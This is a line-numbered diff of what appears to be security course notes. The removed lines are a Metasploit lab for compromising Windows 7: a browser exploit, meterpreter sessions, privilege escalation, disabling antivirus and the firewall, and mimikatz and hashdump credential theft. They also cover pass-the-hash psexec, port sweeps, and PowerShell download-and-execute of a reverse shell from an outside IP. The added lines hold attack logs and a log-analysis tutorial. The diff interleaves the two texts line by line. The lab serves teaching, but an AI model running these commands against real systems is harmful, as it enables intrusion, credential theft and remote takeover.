946	+	<189>Nov 11 2006 17:04:45: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=mv%20/tmp/tmp.lang.php%20/tmp/.ICE-unix/tmp.lang.php
947	-	function Get-GrabLogs{
947	+	<189>Nov 11 2006 17:05:15: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/.ICE-unix/tmp&cmd=ls%20-la%20/tmp/.ICE-unix
948	-	[CmdletBinding()]
948	+	<189>Nov 11 2006 17:05:27: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20/tmp/.ICE-unix
949	-	param(
949	+	<189>Nov 11 2006 17:05:28: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/favicon.ico
950	-	[Parameter(Mandatory=$True)]
950	+	<189>Nov 11 2006 17:07:08: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=mv%20/tmp/tmp.lang.php%20/tmp/.ICE-unix/tmp.lang.php
951	-	$LogName
951	+	<189>Nov 11 2006 17:07:24: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=mv%20/tmp/tmp.lang.php%20/tmp/.ICE-unix/tmp.lang.php
952	-	)
952	+	<189>Nov 11 2006 17:07:25: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/favicon.ico
953	-	Get-EventLog -LogName $LogName \| Export-Clixml C:\Users\SecureNinja\Desktop\Scripts\$LogName.xml
953	+	<189>Nov 11 2006 17:07:41: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/.ICE-unix/tmp&cmd=ls%20-la%20/tmp/.ICE-unix
954	-	}
954	+	<189>Nov 11 2006 17:07:48: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20/tmp/.ICE-unix
955		<189>Nov 11 2006 17:07:49: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/favicon.ico
956	-	#######################
956	+	<189>Nov 11 2006 17:13:13: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=cp%20/tmp/tmp.lang.php%20/tmp/.ICE-unix/tmp.lang.php
957	-	# Attacking Windows 7 #
957	+	<189>Nov 11 2006 17:13:35: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20/tmp
958	-	#######################
958	+	<189>Nov 11 2006 17:14:11: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20/tmp/.ICE-unix
959	-	NOTE: You'll be using your Ubuntu Linux host as the attacker machine in this lab
959	+	<189>Nov 11 2006 17:14:35: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/.ICE-unix/tmp&cmd=ls%20-la%20/tmp/.ICE-unix
960		<189>Nov 11 2006 17:14:41: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/.ICE-unix/tmp&cmd=ls%20-la%20/tmp/
961	-	sudo /sbin/iptables -F
961	+	<189>Nov 11 2006 17:15:14: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/.ICE-unix/tmp&cmd=rm%20[-fri]%20/tmp/tmp.lang.php
962	-	infosecaddicts
962	+	<189>Nov 11 2006 17:15:27: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/.ICE-unix/tmp&cmd=ls%20-la%20/tmp
963		<189>Nov 11 2006 17:31:11: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/.ICE-unix/tmp&cmd=ls%20-la%20/tmp/.ICE-unix
964	-	cd ~/toolz/metasploit
964	+	<189>Nov 11 2006 17:52:07: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/.ICE-unix/tmp&cmd=tar%20-xvzf%20/tmp/.ICE-unix/11232.tgz
965		<189>Nov 11 2006 17:52:14: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/.ICE-unix/tmp&cmd=ls%20-la%20/tmp/.ICE-unix
966	-	./msfconsole
966	+	<189>Nov 11 2006 17:53:31: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/.ICE-unix/tmp&cmd=tar%20-xvzf%20/tmp/.ICE-unix/11232.tgz
967		<189>Nov 11 2006 17:53:53: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/.ICE-unix/tmp&cmd=ls%20-la%20/tmp/
968	-	use exploit/windows/browser/ie_cgenericelement_uaf
968	+	<189>Nov 11 2006 17:54:07: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/.ICE-unix/tmp&cmd=ls%20-la%20/tmp/.ICE-unix
969		<189>Nov 11 2006 17:56:56: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/.ICE-unix/tmp&cmd=ls%20-la%20/
970	-	set ExitOnSession false
970	+	<189>Nov 11 2006 17:57:00: %Customer_PIX: Attacker_IP Accessed URL Target_IP:/oz/common/login.php?default_language=../../../../../../../tmp/.ICE-unix/tmp&cmd=ls%20-la
971
972	-	set URIPATH /ie8
972	+
973
974	-	set PAYLOAD windows/meterpreter/reverse_tcp
974	+
975
976	-	set LHOST InfoSecAddictsVM
976	+
977		##############################################
978	-	exploit -j
978	+	# Log Analysis with Linux command-line tools #
979		##############################################
980		The following command line executables are found in the Mac as well as most Linux Distributions.
981	-	- Now from the Win7 host, use Internet Explorer 8 to connect to the exploit address (local address)
981	+
982	-	- given to you by metasploit.
982	+	cat – prints the content of a file in the terminal window
983		grep – searches and filters based on patterns
984	-	- The address will be something like:
984	+	awk – can sort each row into fields and display only what is needed
985		sed – performs find and replace functions
986	-	http://infosecaddicts-VM-IP:8080/ie8
986	+	sort – arranges output in an order
987		uniq – compares adjacent lines and can report, filter or provide a count of duplicates
988
989
990	-	- This will simulate a victim clicking on your malicious link and being exploited with a browser exploit.
990	+	##############
991		# Cisco Logs #
992		##############
993	-	###########################
993	+
994	-	# Client-Side Enumeration #
994	+	AWK Basics
995	-	###########################
995	+
996		To quickly demonstrate the print feature in awk, we can instruct it to show only the 5th word of each line. Here we will print $5. Only the last 4 lines are being shown for brevity.
997
998	-	- You can list the active sessions by typing:
998	+	-----------------------------Type this-----------------------------------------
999	-	------------------------Type This------------------------------
999	+	cat cisco.log \| awk '{print $5}' \| tail -n 4
1000	-	sessions -l
1000	+	-------------------------------------------------------------------------------
1001
1002
1003
1004		Looking at a large file would still produce a large amount of output. A more useful thing to do might be to output every entry found in “$5”, group them together, count them, then sort them from the greatest to least number of occurrences. This can be done by piping the output through “sort“, using “uniq -c” to count the like entries, then using “sort -rn” to sort it in reverse order.
1005	-	- You can "interact" with any active session by typing sessions -i 3 (replace 3 with the session number you want to interact with)
1005	+
1006		-----------------------------Type this-----------------------------------------
1007	-	------------------------Type This------------------------------
1007	+	cat cisco.log \| awk '{print $5}'\| sort \| uniq -c \| sort -rn
1008	-	sessions -i 1
1008	+	-------------------------------------------------------------------------------
1009
1010
1011
1012		While that’s sort of cool, it is obvious that we have some garbage in our output. Evidently we have a few lines that aren’t conforming to the output we expect to see in $5. We can insert grep to filter the file prior to feeding it to awk. This insures that we are at least looking at lines of text that contain “facility-level-mnemonic”.
1013
1014	-	- You should now see Metasploit's meterpreter prompt.
1014	+	-----------------------------Type this-----------------------------------------
1015		cat cisco.log \| grep %[a-zA-Z]-[0-9]-[a-zA-Z] \| awk '{print $5}' \| sort \| uniq -c \| sort -rn
1016		-------------------------------------------------------------------------------
1017	-	******************************** Figure out who and where you are ********************************
1017	+
1018
1019	-	meterpreter> sysinfo
1019	+
1020
1021		Now that the output is cleaned up a bit, it is a good time to investigate some of the entries that appear most often. One way to see all occurrences is to use grep.
1022	-	meterpreter> getuid
1022	+
1023		-----------------------------Type this-----------------------------------------
1024		cat cisco.log \| grep %LINEPROTO-5-UPDOWN:
1025	-	meterpreter> ipconfig
1025	+
1026		cat cisco.log \| grep %LINEPROTO-5-UPDOWN:\| awk '{print $10}' \| sort \| uniq -c \| sort -rn
1027
1028	-	meterpreter> run post/windows/gather/checkvm
1028	+	cat cisco.log \| grep %LINEPROTO-5-UPDOWN:\| sed 's/,//g' \| awk '{print $10}' \| sort \| uniq -c \| sort -rn
1029
1030		cat cisco.log \| grep %LINEPROTO-5-UPDOWN:\| sed 's/,//g' \| awk '{print $10 " changed to " $14}' \| sort \| uniq -c \| sort -rn
1031	-	meterpreter> run get_local_subnets
1031	+	--------------------------------------------------------------------------------
1032
1033
1034
1035	-	******************************** Escalate privileges and get hashes ********************************
1035	+
1036		Let's really have some fun:
1037		-----------------------------Type this-----------------------------------------
1038	-	meterpreter> use priv
1038	+	cat cisco.log \| grep '^[*]' \| awk '{print $1, $2, substr($3, 1, 2)":00", "-", substr($3, 1, 2)":59", $5, $6, $7, $8, $9}' \| sort \| uniq -c \| awk '{print $1 " events between " $2 " " $3 " and " $4 $5 " -", $6, $7, $8, $9, $10}' \| sort -rn
1039		--------------------------------------------------------------------------------
1040
1041	-	--Option 1: GetSystem
1041	+	Explanation:
1042	-	meterpreter> getsystem
1042	+	$1, $2: The month and day (*Sep 4).
1043		substr($3, 1, 2)":00": The start of the hour (05:00).
1044	-	--Option 2:
1044	+	substr($3, 1, 2)":59": The end of the hour (05:59).
1045	-	meterpreter > run post/windows/escalate/getsystem
1045	+	$5, $6, $7, $8, $9: The event type and details.
1046		awk: Formats the output to clearly show "X events between [date] [start time] and [end time] - [event details]".
1047	-	--Option 3:
1047	+
1048	-	meterpreter> background
1048	+
1049	-	back
1049	+
1050	-	use post/windows/escalate/droplnk
1050	+	Find All SSH-Related Events and Group by Action (Enabled/Disabled)
1051	-	set SESSION 1
1051	+	-----------------------------Type this-----------------------------------------
1052	-	set PAYLOAD windows/meterpreter/reverse_tcp
1052	+	cat cisco.log \| grep '%SSH-' \| awk '{print $1, $2, substr($3, 1, 2)":00", "-", substr($3, 1, 2)":59", $5, $6, $7, $8}' \| sort \| uniq -c \| awk '{print $1 " SSH events between " $2 " " $3 " and " $4 $5 " -", $6, $7, $8, $9}' \| sort -rn
1053	-	set LHOST infosecaddicts-VM-IP
1053	+
1054	-	set LPORT 1234
1054	+	--------------------------------------------------------------------------------
1055	-	exploit
1055	+
1056		Explanation:
1057	-	--Option 4:
1057	+	This command finds all SSH-related events (%SSH-).
1058	-	use exploit/windows/local/bypassuac
1058	+	It shows when SSH was enabled or disabled within specific time ranges.
1059	-	set SESSION 1
1059	+	You get the number of SSH events that occurred in each hour.
1060	-	set PAYLOAD windows/meterpreter/reverse_tcp
1060	+
1061	-	set LHOST infosecaddicts-VM-IP
1061	+
1062	-	set LPORT 12345
1062	+
1063	-	exploit
1063	+	Count Interface State Changes (Up/Down) and Group by Interface
1064		-----------------------------Type this-----------------------------------------
1065	-	--Option 5:
1065	+	cat cisco.log \| grep '^[*]' \| awk '{print $1, $2, substr($3, 1, 2)":00", "-", substr($3, 1, 2)":59", $5, $6, $7, $8, $9}' \| sort \| uniq -c \| awk '{print $1 " events between " $2 " " $3 " and " $4 $5 " -", $6, $7, $8, $9, $10}' \| sort -rn
1066	-	use exploit/windows/local/service_permissions
1066	+
1067	-	set SESSION 1
1067	+	--------------------------------------------------------------------------------
1068	-	set PAYLOAD windows/meterpreter/reverse_tcp
1068	+
1069	-	set LHOST infosecaddicts-VM-IP
1069	+	Explanation:
1070	-	set LPORT 5555
1070	+	This command captures log entries related to interface state changes (%LINEPROTO-5-UPDOWN).
1071	-	exploit
1071	+	It groups events by interface name and shows whether the state changed to "up" or "down" during a specific hour.
1072		Useful for analyzing interface reliability or troubleshooting connectivity issues.
1073	-	--Option 6:
1073	+
1074	-	use exploit/windows/local/trusted_service_path
1074	+
1075	-	set SESSION 1
1075	+
1076	-	set PAYLOAD windows/meterpreter/reverse_tcp
1076	+	Find All Configuration Changes by User
1077	-	set LHOST infosecaddicts-VM-IP
1077	+	-----------------------------Type this-----------------------------------------
1078	-	set LPORT 4567
1078	+	grep '%SYS-5-CONFIG_I' cisco.log \| awk '{month=$1; day=$2; time=$3; hour=substr(time,1,2); user=$NF; start_time=hour ":00"; end_time=hour ":59"; print month, day, start_time, end_time, user}' \| sort \| uniq -c \| awk '{print $1 " configuration change(s) between " $2 " " $3 " and " $4 " " $5 " by user " $6}' \| sort -rn
1079	-	exploit
1079	+	--------------------------------------------------------------------------------
1080
1081		Explanation:
1082	-	--Option 7:
1082	+	This command finds configuration changes from the %SYS-5-CONFIG_I log entries.
1083	-	use exploit/windows/local/ppr_flatten_rec
1083	+	It shows the time and user who made the changes, making it easy to audit the configuration changes.
1084	-	set SESSION 1
1084	+	Useful for understanding when and by whom system settings were modified.
1085	-	set PAYLOAD windows/meterpreter/reverse_tcp
1085	+
1086	-	set LHOST infosecaddicts-VM-IP
1086	+
1087	-	set LPORT 7777
1087	+
1088	-	exploit
1088	+	Track DHCP Events and Conflicts
1089		-----------------------------Type this-----------------------------------------
1090	-	--Option 8:
1090	+	cat cisco.log \| grep '%DHCPD-' \| awk '{print $1, $2, substr($3, 1, 2)":00", substr($3, 1, 2)":59", $5, $6, $7, $8, $9, $10}' \| sort \| uniq -c \| awk '{print $1 " DHCP events between " $2 " " $3 " and " $4 " -", $5, $6, $7, $8, $9, $10}' \| sort -rn
1091	-	use exploit/windows/local/ms_ndproxy
1091	+	--------------------------------------------------------------------------------
1092	-	set SESSION 1
1092	+
1093	-	set PAYLOAD windows/meterpreter/reverse_tcp
1093	+	Explanation:
1094	-	set LHOST infosecaddicts-VM-IP
1094	+	This command identifies DHCP-related logs (e.g., address conflicts).
1095	-	set LPORT 7788
1095	+	It helps troubleshoot IP conflicts and DHCP server issues.
1096	-	exploit
1096	+	By grouping the events by hour, you can identify when DHCP issues are most frequent.
1097
1098
1099	-	--Option 9:
1099	+
1100	-	use exploit/windows/local/ask
1100	+
1101	-	set SESSION 1
1101	+
1102	-	set PAYLOAD windows/meterpreter/reverse_tcp
1102	+
1103	-	set LHOST infosecaddicts-VM-IP
1103	+
1104	-	set LPORT 7799
1104	+
1105	-	exploit
1105	+	1. Process: Read, Write, and Math
1106		In Linux, processing involves reading input (from files or commands), writing output, and performing calculations.
1107
1108	-	meterpreter > getuid
1108	+	Example: Basic File Processing
1109	-	Server username: win7-64-victim\Workshop
1109	+	# Process: Read each line in a file (log.txt)
1110		-----------------------------Type this-----------------------------------------
1111	-	meterpreter > getsystem
1111	+	echo "success" > log.txt
1112	-	...got system (via technique 1).
1112	+	echo "error" >> log.txt
1113		echo "success" >> log.txt
1114		cat log.txt
1115	-	meterpreter > getuid
1115	+	--------------------------------------------------------------------------------
1116	-	Server username: NT AUTHORITY\SYSTEM
1116	+	This command reads (processes) the contents of a file.
1117
1118		Example: Writing Output
1119
1120		# Process: Write "Issue found" to a file (output.txt)
1121	-	meterpreter > ps (search for a process running as NT AUTHORITY\SYSTEM)
1121	+	-----------------------------Type this-----------------------------------------
1122		echo "Issue found" >> output.txt
1123	-	meterpreter > migrate 2800 (your process id WILL NOT be 2800, but make sure you use one that is running at NT AUTHORITY\SYSTEM)
1123	+	cat output.txt
1124		-------------------------------------------------------------------------------
1125	-	meterpreter> run killav
1125	+	This writes the output into a file.
1126
1127	-	meterpreter> run post/windows/gather/hashdump
1127	+	Example: Math (Simple Arithmetic)
1128		# Process: Add two numbers
1129	-	meterpreter> run post/windows/gather/credentials/credential_collector
1129	+	-----------------------------Type this-----------------------------------------
1130		echo $((2 + 3))
1131		-------------------------------------------------------------------------------
1132	-	******************************** Steal Tokens ********************************
1132	+	In this example, Linux is used to perform basic arithmetic.
1133
1134	-	meterpreter > getsystem
1134	+	2. Decision: If/Then
1135		In Linux, conditional logic is handled using if statements, similar to the decision-making process in programming languages.
1136	-	meterpreter > use incognito
1136	+
1137		Example: Conditional Logic (Decision)
1138	-	meterpreter > list_tokens -u
1138	+	# Decision: If a log line contains the word "error", then write "Found an error"
1139		-----------------------------Type this-----------------------------------------
1140	-	meterpreter > list_tokens -g
1140	+	if grep -q "error" log.txt; then
1141		echo "Found an error" >> output.txt
1142	-	meterpreter > impersonate_token <-- choose who you want to impersonate but be sure to use 2 slashes in the name (ex: impersonate_token domain\\user)
1142	+	fi
1143		-------------------------------------------------------------------------------
1144	-	meterpreter> getuid
1144	+
1145
1146		-----------------------------Type this-----------------------------------------
1147	-	********** Stealing credentials and certificates **********
1147	+	cat output.txt
1148	-	- NOTE: Most of the stuff after 'kerberos' DOES NOT work, but is given here so you know the correct syntax to use when connected to AD or dealing with smart/CAC cards.
1148	+	-------------------------------------------------------------------------------
1149		Process: Read the file log.txt and search for the word "error".
1150	-	meterpreter > getsystem
1150	+	Decision: If the word "error" is found, write "Found an error" to output.txt.
1151
1152	-	meterpreter > load mimikatz
1152	+	3. Loop: For
1153		Loops are used to repeat a set of instructions. In Linux, the for loop is common for automating repetitive tasks.
1154	-	meterpreter > kerberos
1154	+
1155		Example: Looping Over File Lines
1156	-	meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"
1156	+
1157		# Loop: For each line in the file, check for "error"
1158	-	meterpreter > msv <-- Your AD password
1158	+	-----------------------------Type this-----------------------------------------
1159		while read line; do
1160	-	meterpreter > livessp <-- Your Windows8 password
1160	+	# Decision: If line contains "error", then process it
1161		if [[ $line == "error" ]]; then
1162	-	meterpreter > ssp <-- Your outlook password
1162	+	echo "Found error: $line"
1163		fi
1164	-	meterpreter > tspkg <-- Your AD password
1164	+	done < log.txt
1165		-------------------------------------------------------------------------------
1166	-	meterpreter > wdigest <-- Your AD password
1166	+
1167
1168	-	meterpreter > mimikatz_command -f crypto::listStores
1168	+	Putting It All Together
1169		Using the Process, Decision, and Loop concepts, you can automate Linux commands. Let’s build an automation that checks each line of a log file for errors and reports them.
1170	-	meterpreter > mimikatz_command -f crypto::listCertificates
1170	+
1171		Automation Example:
1172	-	meterpreter > mimikatz_command -f crypto::exportCertificates CERT_SYSTEM_STORE_CURRENT_USER
1172	+	# Automation to scan a file for errors
1173
1174	-	meterpreter > mimikatz_command -f crypto::patchcapi
1174	+	# Loop: For each line in the file
1175		-----------------------------Type this-----------------------------------------
1176	-	meterpreter> search -d <directory> -f <file-pattern>
1176	+	while read line; do
1177		# Decision: If the line contains "error"
1178		if [[ $line == "error" ]]; then
1179	-	******************************** Enumerate the host you are on ********************************
1179	+	# Process: Write "Found error" to the output
1180		echo "Found error: $line" >> output.txt
1181	-	meterpreter > run getcountermeasure
1181	+	fi
1182		# Process: Read from log.txt
1183	-	meterpreter> run winenum
1183	+	done < log.txt
1184		-------------------------------------------------------------------------------
1185	-	meterpreter > run post/windows/gather/enum_applications
1185	+
1186
1187	-	meterpreter > run post/windows/gather/enum_logged_on_users
1187	+	-----------------------------Type this-----------------------------------------
1188		cat output.txt
1189	-	meterpreter > run post/windows/gather/usb_history
1189	+	-------------------------------------------------------------------------------
1190		Breakdown:
1191	-	meterpreter > run post/windows/gather/enum_shares
1191	+	Loop: The while read loop processes every line in the file.
1192		Decision: The if [[ $line == "error" ]] checks if the line contains the word "error".
1193	-	meterpreter > run post/windows/gather/enum_snmp
1193	+	Process: If the condition is met, it writes the error to an output file.
1194		Using the Pastebin Commands:
1195	-	meterpreter> reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
1195	+
1196
1197
1198	-	******************************** FIX PSEXEC ********************************
1198	+
1199
1200	-	- We use the shell command to get to the Victim Dos command so we can add a registry field.
1200	+
1201	-	------------------------Type This------------------------------
1201	+	1. Lesson 1: Reading and Processing Log Files (Process)
1202	-	meterpreter > execute -c -H -f cmd -a "/k" -i
1202	+	Objective: Teach how to read and analyze the contents of a log file.
1203	-	reg /?
1203	+
1204		Command:
1205
1206	-	- Created a registry field to the Victim computer, this will allow us to access the machine using and exploit via PSEXEC.
1206	+	# Process: Read the log file
1207	-	------------------------Type This------------------------------
1207	+	-----------------------------Type this-----------------------------------------
1208	-	C:\Windows\system32> reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1
1208	+	cat cisco.log
1209		-------------------------------------------------------------------------------
1210		Explanation:
1211	-	c:\Windows\system32> netsh advfirewall set allprofiles state off
1211	+
1212		The cat command reads and displays the content of the cisco.log file in the terminal.
1213	-	******************************** Lateral Movement *****************************
1213	+	Extension:
1214
1215		Use filtering to show how to search for important events like "up" or "down" interface states:
1216	-	Now we can run the PSEXEC exploit.
1216	+	# Process: Search for interface state changes in the log
1217	-	-- Option 1:
1217	+	-----------------------------Type this-----------------------------------------
1218	-	use exploit/windows/smb/psexec
1218	+	grep "changed state" cisco.log
1219		-------------------------------------------------------------------------------
1220	-	set SMBUser Workshop
1220	+	This filters the log to only show lines where the interface state has changed.
1221
1222	-	set SMBPass password
1222	+	2. Lesson 2: Making Decisions Based on Log Data (Decision)
1223		Objective: Teach how to implement logic (if/then decisions) in the context of log file analysis.
1224	-	set RHOST Win7-VM-IP
1224	+
1225		Command:
1226	-	set payload windows/meterpreter/reverse_tcp
1226	+
1227		# Decision: If the log contains any "down" interface, notify the user
1228	-	set LHOST infosecaddicts-VM-IP
1228	+	-----------------------------Type this-----------------------------------------
1229		if grep -q "down" cisco.log; then
1230	-	set LPORT 2345
1230	+	echo "An interface went down"
1231		else
1232	-	exploit
1232	+	echo "No interfaces are down"
1233		fi
1234		-------------------------------------------------------------------------------
1235		Explanation:
1236
1237	-	-- Option 2:
1237	+	Process: The command uses grep -q to check if any line in the file contains the word "down".
1238	-	use exploit/windows/smb/psexec
1238	+	Decision: The if statement checks whether an interface went down and prints a message accordingly.
1239		3. Lesson 3: Looping Through Log Entries (Loop)
1240	-	set SMBUser Workshop
1240	+	Objective: Teach how to loop through each line of the log file, checking for specific conditions.
1241
1242	-	set SMBPass aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
1242	+	Command:
1243
1244	-	set payload windows/meterpreter/reverse_tcp
1244	+	# Loop: For each line in the log file, check for state changes
1245		-----------------------------Type this-----------------------------------------
1246	-	set RHOST Win7-VM-IP
1246	+	while read line; do
1247		if [[ $line == "changed state to down" ]]; then
1248	-	set LHOST infosecaddicts-VM-IP
1248	+	echo "Interface went down: $line"
1249		fi
1250	-	set LPORT 5678
1250	+	done < cisco.log
1251		-------------------------------------------------------------------------------
1252	-	exploit
1252	+	Explanation:
1253	-	####################################################
1253	+
1254	-	# Running Powershell From A Command Prompt #
1254	+	Loop: This script uses while read to loop over each line in the cisco.log file.
1255	-	# Using Powersploit & Nishang #
1255	+	Decision: For each line, it checks if the line contains the phrase "changed state to down".
1256	-	####################################################
1256	+	Process: If the condition is met, it prints the line where the interface went down.
1257		4. Lesson 4: Searching for Specific Events in Logs (Process & Decision)
1258	-	COMMAND & 1 PARAMATER SYNTAX:
1258	+	Objective: Teach how to search for a range of specific events like DHCP conflicts and SSH status changes.
1259	-	powershell -command "& {&'some-command' someParam}"
1259	+
1260		Command:
1261
1262		# Process: Search for SSH enable/disable events and DHCP conflicts
1263	-	MULTIPLE COMMAND & PARAMETER SYNTAX
1263	+	-----------------------------Type this-----------------------------------------
1264	-	powershell -command "& {&'some-command' someParam}"; "& {&'some-command' -SpecificArg someParam}"
1264	+	grep -E "SSH\|DHCP" cisco.log
1265		-------------------------------------------------------------------------------
1266		Extension:
1267		Use conditional analysis for different types of events:
1268	-	Tools to download to the web root (/var/www) of your infosecaddicts-Ubuntu-VM:
1268	+
1269	-	git clone https://github.com/mattifestation/PowerSploit.git
1269	+
1270	-	git clone https://github.com/samratashok/nishang
1270	+	# Loop: Process each log line for different events (SSH, DHCP)
1271		-----------------------------Type this-----------------------------------------
1272	-	from the infosecaddicts home dir copy nc.exe to /var/www/ folder
1272	+	while read line; do
1273		case "$line" in
1274	-	user:infosecaddicts
1274	+	"SSH-5-ENABLED")
1275	-	pass:infosecaddicts
1275	+	echo "SSH enabled: $line" ;;
1276		"SSH-5-DISABLED")
1277		echo "SSH disabled: $line" ;;
1278		"DHCPD-4-PING_CONFLICT")
1279	-	sudo cp nc.exe /var/www/
1279	+	echo "DHCP conflict detected: $line" ;;
1280		esac
1281	-	cd /var/www/html/
1281	+	done < cisco.log
1282	-	sudo git clone https://github.com/samratashok/nishang
1282	+	-------------------------------------------------------------------------------
1283	-	sudo git clone https://github.com/mattifestation/PowerSploit
1283	+	Explanation:
1284
1285		Process: This command uses grep -E to search for multiple patterns (SSH and DHCP events).
1286	-	******************************** Simple Ping Sweep ********************************
1286	+	Loop & Decision: It loops through each log entry and classifies it based on the event type.
1287	-	powershell -command "50..100 \| % {\""149.28.201.$($_): $(Test-Connection -count 1 -comp 149.28.201.$($_) -quiet)\""}"
1287	+	5. Lesson 5: Counting Events and Generating a Summary (Process & Loop)
1288		Objective: Teach how to summarize log file data by counting occurrences of specific events.
1289
1290		Command:
1291
1292		# Process: Count occurrences of SSH enable, disable, and DHCP conflicts in the log
1293	-	******************************** Simple Port 445 Sweep ********************************
1293	+	-----------------------------Type this-----------------------------------------
1294	-	powershell -command "1..255 \| % { echo ((new-object Net.Sockets.TcpClient).Connect(\""149.28.201.$_\"",445)) \""149.28.201.$_\""} 2>$null"
1294	+	echo "SSH enabled count: $(grep -c "SSH-5-ENABLED" cisco.log)"
1295		echo "SSH disabled count: $(grep -c "SSH-5-DISABLED" cisco.log)"
1296		echo "DHCP conflict count: $(grep -c "DHCPD-4-PING_CONFLICT" cisco.log)"
1297		-------------------------------------------------------------------------------
1298		Explanation:
1299
1300		Process: The grep -c command counts the number of times each event occurs in the log.
1301	-	******************************** Simple Port Scan ********************************
1301	+	Loop: This approach can be extended to process the entire file and generate useful statistics.
1302	-	powershell -command "1..1024 \| % { echo ((new-object Net.Sockets.TcpClient).Connect(\""149.28.201.XX\"",$_)) \""$_ is open\""} 2>$null"
1302	+	6. Lesson 6: Automating Responses to Critical Log Events (Loop & Decision)
1303		Objective: Automate responses based on critical events found in the log file.
1304
1305		Command:
1306
1307
1308		# Loop through log entries and perform actions based on the content
1309	-	******************************** Download a file ********************************
1309	+	-----------------------------Type this-----------------------------------------
1310	-	powershell -command "(New-Object System.Net.WebClient).DownloadFile('http://149.28.201.171/nc.exe', 'nc.exe')"
1310	+	while read line; do
1311		if [[ $line == "changed state to down" ]]; then
1312		# Decision: Take action for critical events (interface down)
1313		echo "Critical issue detected: $line"
1314		# Example action: Send alert (e.g., email or log the event)
1315		echo "Alert: Interface down on $(echo $line \| cut -d' ' -f7)" >> alerts.log
1316	-	******************************** Downloading files: Binaries ********************************
1316	+	fi
1317	-	powershell -command "(New-ObjectSystem.Net.WebClient).DownloadFile("http://149.28.201.171/nc.exe","c:\nc.exe")"
1317	+	done < cisco.log
1318		-------------------------------------------------------------------------------
1319		Explanation:
1320
1321		Loop: The script iterates through each log entry.
1322		Decision: It checks for the phrase "changed state to down" and triggers an action such as logging the issue or sending an alert.
1323	-	******************************** Text file stdout to local file ********************************
1323	+	Summary of Key Concepts
1324	-	(New-Object System.Net.WebClient).DownloadString("http://149.28.201.171/PowerSploit/CodeExecution/Invoke-Shellcode.ps1") \| Out-File -Encoding ASCII Invoke-Shellcode.ps1
1324	+	Process:
1325
1326		Reading from files (cat, grep).
1327		Writing to files (echo).
1328		Counting and summarizing log data (grep -c).
1329	-	******************************** Powershell Download & Execute Reverse Meterpreter ********************************
1329	+	Decision:
1330	-	from ubuntu host browse to metasploit folder
1330	+
1331	-	cd ~/toolz/metasploit/
1331	+	if statements to check log entries for specific keywords (like "down", "SSH", or "DHCP").
1332		Using case to classify log entries based on event types.
1333	-	./msfconsole
1333	+	Loop:
1334	-	use exploit/multi/handler
1334	+
1335	-	set ExitOnSession false
1335	+	while read loops to process each line in the log file.
1336	-	set payload windows/meterpreter/reverse_https
1336	+	Automating responses for specific conditions in the log (e.g., critical errors, DHCP conflicts).
1337	-	set LHOST 149.28.201.171
1337	+	Final Activity: Automating a Log Monitoring System
1338	-	set LPORT 4443
1338	+	Objective: Use a combination of the above commands to create an automated log monitoring system that processes the cisco.log file and detects important events.
1339	-	set EXITFUNC thread
1339	+
1340	-	exploit -j
1340	+	Example:
1341
1342
1343		# Automated log monitoring system
1344	-	powershell -command "IEX (New-Object Net.WebClient).DownloadString('https://s3.amazonaws.com/infosecaddictsfiles/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 149.28.201.171 -Lport 4443 -Force"
1344	+	-----------------------------Type this-----------------------------------------
1345		while read line; do
1346		if [[ $line == "changed state to down" ]]; then
1347		echo "Critical Issue: Interface down: $line" >> critical_issues.log
1348		elif [[ $line == "DHCPD-4-PING_CONFLICT" ]]; then
1349		echo "DHCP conflict detected: $line" >> dhcp_conflicts.log
1350	-	******************************** Payload which could execute shellcode from DNS TXT queries. ********************************
1350	+	elif [[ $line == "SSH-5-ENABLED" \|\| $line == "SSH-5-DISABLED" ]]; then
